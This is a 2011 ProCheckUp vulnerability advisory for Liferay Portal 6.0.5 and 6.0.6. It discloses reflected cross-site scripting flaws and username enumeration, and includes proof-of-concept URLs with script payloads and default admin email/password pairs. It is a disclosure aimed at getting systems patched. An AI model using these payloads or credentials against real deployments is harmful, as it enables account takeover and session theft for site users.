New Banner 3

Services

Find out more about ProCheckUp's services including: Penetration Testing, PCI QSA and PCI ASV

PR11-08

PR11-08 - Liferay Portal multiple unauthenticated & authenticated XSS and username enumeration

ProCheckUp Labs

ProCheckUp Labs are dedicated to conducting research and raising the awareness of information security issues. The combination of ProCheckNet's response-driven AI technology and our experienced security consultants has led to the discovery of many security vulnerabilities and advisories during penetration testing assignments.

In 2008 ProCheckUp published more vulnerabilities than any other UK penetration testing company.

Over the years, ProCheckUp have been credited with finding vulnerabilities and advisories in products from vendors such as:  

Microsoft - Aruba Networks - IBM - Novell - BEA Systems - Whale Communications - Netscape - Hummingbird - Apache- F5 Networks - GoAhead - Sun Microsystems

Advisories (Vulnerabilities) & Papers

Vulnerability found:
05 September 2011
Vendor informed:
12 September 2010
Severity level:
Medium (Script injection)
Credits:
Richard Brain of ProCheckUp Ltd (www.procheckup.com)
Description:
Multiple Cross-site Scripting vulnerabilities exist within the Liferay Portal software.

ProCheckUp has found by making a malformed requests to the Liferay Portal with and without being authenticated, multiple vanilla cross site scripting (XSS) vulnerabilities exist. In addition Liferay has a vulnerability which allows valid user names to be enumerated, which allows the default admin accounts to be enumerated.

Successfully tested on:-
Versions : 6.0.5, some on version 6.0.6
Proof of concept:
1) Unauthenticated XSS attacks
The following attacks have been tested with IE and Firefox:-

http://target-domain.foo /netvibes/web/guest/home/-/</title><script>alert(1)</script>

http://target-domain.foo/html/js/editor/editor.jsp?&initMethod=_33_initEditord%3balert(1)//

http://target-domain.foo/html/js/editor/fckeditor.jsp?initMethod=test%3b%0A%0D}%0A%0D}%0A%0Dalert%281%29;%0A%0Dfunction%20blah%28%29{{//
http://target-domain.foo/html/js/editor/tinymce.jsp?onChangeMethod=test%3b%0A%0D}%0A%0D}%0A%0Dalert%281%29;%0A%0Dfunction%20blah%28%29{{//

Version 6.0.5 attack variant
http://target-domain.foo/html/js/editor/ckeditor.jsp?initMethod=test%3b}%0a%0dalert(1);%0a%0dfunction blah(){//

Version 6.0.6 attack variant
http://target-domain.foo/html/js/editor/ckeditor.jsp?initMethod=test)%3b}%0a%0dalert(1);%0a%0dfunction blah(){//

http://target-domain.foo/html/js/editor/liferay.jsp?onChangeMethod=test%3b%0A%0D%7d%0A%0D%7d%0A%0D%7d%0A%0Dalert%281%29;%0A%0Dfunction%20blah%28%29%7b%0A%0Dif%20%28emotionWindow%20!=%20null%29%20%7b%0A%0Dtry%20%7bparent.test;//&disableControl=2&request=1

http://target-domain.foo/web/guest/availability-check?p_p_id=58&redirect=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

2) Authenticated XSS attacks
The following attacks work with IE only:-

http://target-domain.foo/ ar/web/guest/home?p_p_id=86&p_p_state=maximized&_86_=&_86_portletResource=<script>alert(1)</script>&_86_struts_action=%2Fportlet_configuration%2Fexport_import

http://target-domain.foo/ ar/group/22/1?p_p_id=86&p_p_state=maximized&_86_struts_action=%2Fportlet_configuration%2Fexport_import&_86_portletResource=<script>alert("XSS")</script>

http://target-domain.foo/ar/group/control_panel "><ScRiPt>alert(1)</ScRiPt>=1

http://target-domain.foo /ar/group/control_panel/manage?refererPlid=\"><ScRiPt>alert(1)</ScRiPt>

http://target-domain.foo /group/control_panel?"><ScRiPt>alert(1)</ScRiPt>=1
An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious webpage. The malicious code would run in the security context of the vulnerable website.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.

3) The Liferay forgot password page can also be used for username enumeration, as a different error message is returned when a valid user name though wrong password is entered. Compared to an invalid user name being entered.

This is important as the Liferay, default admin accounts can be enumerated:-
Email address: bruno@7cogs.com
Password: bruno

Email address: test@liferay.com
Password: test
How to fix:
Update to Liferay Portal version 6.1.1 or a later version.
Legal:
Copyright 2011-2013 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.

Back to Vulnerabilities List